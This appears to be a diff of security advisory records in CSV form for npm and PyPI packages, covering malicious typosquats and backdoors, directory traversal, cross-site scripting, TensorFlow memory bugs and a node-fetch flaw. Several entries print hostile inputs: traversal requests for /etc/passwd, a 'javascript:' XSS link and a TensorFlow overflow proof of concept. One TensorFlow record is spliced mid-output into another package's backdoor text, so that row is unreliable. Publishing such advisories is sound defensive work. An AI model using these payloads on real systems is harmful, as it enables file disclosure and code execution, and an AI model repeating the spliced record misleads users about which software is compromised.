+Upgrade to version 3.0.4 or later. There is no indication of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'load-from-cwd-or-npm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.2'}, {'fixed': '3.0.4'}]}], 'versions': ['3.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1082'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g9wf-393q-4w38,2021-09-30T17:44:24Z,2020-09-03T17:28:26Z,,[],Malicious Package in only-test-not-install,"All versions of `only-test-not-install` contain malicious code. The package deletes the folder `~/test` from the system as a postinstall script.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no further signs of compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'only-test-not-install'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1044'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r2vw-jgq9-jqx2,2020-08-31T19:02:48Z,2020-09-03T15:54:11Z,,[],Improper Authorization in @sap-cloud-sdk/core,"Affected versions of `@sap-cloud-sdk/core` do not properly validate JWTs. The `verifyJwt()` function does not properly validate the URL from where the public verification key for the JWT can be downloaded. Any URL was trusted which makes it possible to provide a URL belonging to a manipulated JWT.
+
+
+## Recommendation
+
+Upgrade to version 1.21.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@sap-cloud-sdk/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.21.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1540'}]","{'cwe_ids': ['CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:02:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h5vj-f7r9-w564,2021-10-01T13:30:18Z,2020-09-01T21:22:35Z,,[],Entropy Backdoor in text-qrcode,"All versions of `text-qrcode` contain malicious code that overwrites the `randomBytes` method for the `crypto` module with a function that generates weak entropy. Instead of generating 32 bytes, the infected randomBytes will generate 3 bytes of entropy and hash them, resulting in a 32 byte value being returned, but one that is easily guessable.
+
+
+## Recommendation
+
+Uninstall `text-qrcode` immediately. If the module was used to generate entropy that is load bearing, all such instances of generated entropy must be replaced. This includes things like bitcoin wallets, private keys, encrypted messages, etc.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'text-qrcode'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/738'}]","{'cwe_ids': ['CWE-506'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m362-87jc-f39v,2023-09-05T23:04:08Z,2020-09-01T18:16:24Z,,['CVE-2017-16200'],Directory Traversal in uv-tj-demo,"Affected versions of `uv-tj-demo` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'uv-tj-demo'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16200'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/uv-tj-demo'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/428'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p33q-w45h-2hcj,2021-10-01T13:44:09Z,2020-09-02T18:30:03Z,,[],Malicious Package in 4equest,"All versions of `4equest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '4equest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/837'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j4vm-hg8g-g9qv,2021-09-30T18:39:55Z,2020-09-03T17:33:50Z,,[],Malicious Package in antd-cloud,"All versions of `antd-cloud` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'antd-cloud'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1049'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8q2c-2396-hf7j,2021-09-30T19:31:14Z,2020-09-03T17:34:55Z,,[],Malicious Package in appx-compiler,"All versions of `appx-compiler` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'appx-compiler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1050'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7gc-6hcj-wc42,2021-10-01T21:03:55Z,2020-09-03T17:05:06Z,,[],Malicious Package in path-to-regxep,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'path-to-regxep'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1401'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-crr2-ph72-c52g,2021-09-30T17:44:05Z,2020-09-03T17:27:22Z,,[],Malicious Package in my-very-own-package,"All versions of `my-very-own-package` contain malicious code. The package sends the output of `process.versions`, `process.arch` and `process.platform` to a remote server in a postinstall script.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no further signs of compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'my-very-own-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1043'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x2jj-x3q2-7hph,2023-09-11T20:33:34Z,2020-09-01T17:28:09Z,,['CVE-2017-16160'],Directory Traversal in 11xiaoli,"Affected versions of `11xiaoli` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '11xiaoli'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16160'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/11xiaoli'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/395'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g7p5-5759-qv46,2021-08-26T15:14:23Z,2020-09-25T18:28:38Z,,['CVE-2020-15205'],Data leak in Tensorflow,"### Impact
+The `data_splits` argument of [`tf.raw_ops.StringNGrams`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/StringNGrams) lacks validation. This allows a user to pass values that can cause heap overflow errors and even leak contents of memory
+```python
+>>> tf.raw_ops.StringNGrams(data=[""aa"", ""bb"", ""cc"", ""dd"", ""ee"", ""ff""], data_splits=[0,8], separator="" "", ngram_widths=[3], left_pad="""", right_pad="""", pad_width=0, preserve_short_sequences=False)
+StringNGrams(ngrams== 0.7.6 contained malicious code. The package opens a backdoor to a remote server and executes arbitrary commands, effectively acting as a backdoor.
+
+
+## Recommendation
+
+Any computer that has these versions of the package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rpc-websocket'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.7'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1022'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xr53-m937-jr9c,2021-10-04T21:05:25Z,2020-09-03T15:49:14Z,,[],Cross-Site Scripting in ngx-md,"Versions of `ngx-md` prior to 6.0.3 are vulnerable to Cross-Site Scripting. Links are not properly restricted to http/https and can contain JavaScript which may lead to arbitrary code execution. Markdown input such as `[Click Me](javascript:alert('Injected!'%29)` is rendered as a `Click Me` link that executes JavaScript.
+
+
+## Recommendation
+
+Upgrade to version 6.0.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'ngx-md'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dimpu/ngx-md/issues/129'}, {'type': 'PACKAGE', 'url': 'https://github.com/dimpu/ngx-md'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1485'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qw9c-8p76-3q2x,2023-09-11T16:38:04Z,2020-09-01T18:49:11Z,,['CVE-2017-16148'],Directory Traversal in serve46,"Affected versions of `serve46` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'serve46'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16148'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/serve46'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/456'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w7rc-rwvf-8q5r,2023-04-21T19:34:08Z,2020-09-10T17:46:21Z,,['CVE-2020-15168'],The `size` option isn't honored after following a redirect in node-fetch,"### Impact
+Node Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure.
+
+For most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.
+
+### Patches
+We released patched versions for both stable and beta channels:
+
+- For `v2`: 2.6.1
+- For `v3`: 3.0.0-beta.9
+
+### Workarounds
+None, it is strongly recommended to update as soon as possible.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=&labels=question&template=support-or-usage.md&title=Question%3A+)
+* Contact one of the core maintainers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-fetch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'node-fetch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0-beta.1'}, {'fixed': '3.0.0-beta.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0-beta.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15168'}, {'type': 'WEB', 'url': 'https://github.com/node-fetch/node-fetch/commit/2358a6c2563d1730a0cdaccc197c611949f6a334'}, {'type': 'WEB', 'url': 'https://github.com/node-fetch/node-fetch/commit/eaff0094c4dfdd5b78711a8c4f1b61e33d282072'}, {'type': 'PACKAGE', 'url': 'https://github.com/node-fetch/node-fetch'}]","{'cwe_ids': ['CWE-20', 'CWE-770'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-10T17:44:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xwqw-rf2q-xmhf,2021-09-24T22:00:38Z,2020-09-01T21:23:38Z,,[],Cross-Site Scripting in buefy,"Versions of buefy prior to 0.7.2 are vulnerable to Cross-Site Scripting, allowing attackers to manipulate the DOM and execute remote code. The autocomplete list renders user input as HTML without encoding.
+
+
+## Recommendation
+
+Upgrade to version 0.7.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'buefy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/buefy/buefy/issues/1097'}, {'type': 'PACKAGE', 'url': 'https://github.com/buefy/buefy'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/747'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9q9m-m2f6-jr5q,2021-10-01T14:03:17Z,2020-09-02T20:22:34Z,,[],Malicious Package in chak,"All versions of `chak` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'chak'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/854'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pg59-2f92-5cph,2021-08-26T15:11:34Z,2020-09-25T18:28:21Z,,['CVE-2020-15196'],Heap buffer overflow in Tensorflow,"### Impact
+The `SparseCountSparseOutput` and `RaggedCountSparseOutput` implementations don't validate that the `weights` tensor has the same shape as the data. The check exists for `DenseCountSparseOutput`, where both tensors are fully specified:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117
+
+In the sparse and ragged count weights are still accessed in parallel with the data:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201
+
+But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the bounds of the heap buffer allocated for the weights.
+
+### Patches
+We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
+
+We recommend users to upgrade to TensorFlow 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pg59-2f92-5cph'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15196'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-119', 'CWE-122', 'CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T16:48:44Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-7qg7-6g3g-8vxg,2021-09-30T15:46:17Z,2020-09-03T22:46:25Z,,[],Malicious Package in bwffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bwffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1269'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2jm5-2cqf-6vw9,2021-10-01T20:29:19Z,2020-09-04T15:30:32Z,,[],Malicious Package in baes-x,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'baes-x'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1351'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jrj9-5qp6-2v8q,2020-08-31T18:54:28Z,2020-09-03T23:22:19Z,,[],Machine-In-The-Middle in airtable,"Affected versions of `airtable` are vulnerable to Machine-In-The-Middle. The package has SSL certificate validation disabled by default unintentionally. This may allow attackers in a privileged network position to decrypt intercepted traffic.
+
+
+## Recommendation
+
+Upgrade to version 0.7.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'airtable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.19'}, {'fixed': '0.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1305'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hf5h-hh56-3vrg,2020-08-31T18:12:32Z,2020-09-01T16:02:29Z,,['CVE-2016-10544'],Denial of Service in uws,"Affected versions of `uws` do not properly handle large websocket messages when `permessage-deflate` is enabled, which may result in a denial of service condition.
+
+If `uws` recieves a 256Mb websocket message when `permessage-deflate` is enabled, the server will compress the message prior to executing the length check, and subsequently extract the message prior to processing. This can result in a situation where an excessively large websocket message passes the length checks, yet still gets cast from a Buffer to a string, which will exceed v8's maximum string size and crash the process.
+
+
+## Recommendation
+
+Update to version 0.10.9 or later.
+
+Alternatively, disable `permessage-deflate`.",[],"[{'package': {'ecosystem': 'npm', 'name': 'uws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.10.8'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10544'}, {'type': 'WEB', 'url': 'https://github.com/uWebSockets/uWebSockets/commit/37deefd01f0875e133ea967122e3a5e421b8fcd9'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/149'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r863-p739-275c,2021-10-01T14:09:36Z,2020-09-11T21:09:24Z,,[],Malicious Package in reuest,"All versions of `reuest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'reuest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/866'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wfjh-3hq2-r276,2021-09-30T20:27:36Z,2020-09-03T19:56:48Z,,[],Malicious Package in node-spdy,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-spdy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1138'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fg6m-q92x-vv38,2023-09-13T23:06:11Z,2020-09-01T17:26:00Z,,['CVE-2017-16158'],Directory Traversal in dcserver,"Affected versions of `dcserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dcserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16158'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/tiny-http'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/393'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8mmf-qp7j-2w24,2021-09-30T21:53:41Z,2020-09-02T21:35:33Z,,[],Malicious Package in colour-string,"Version 1.5.3 of `colour-string` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
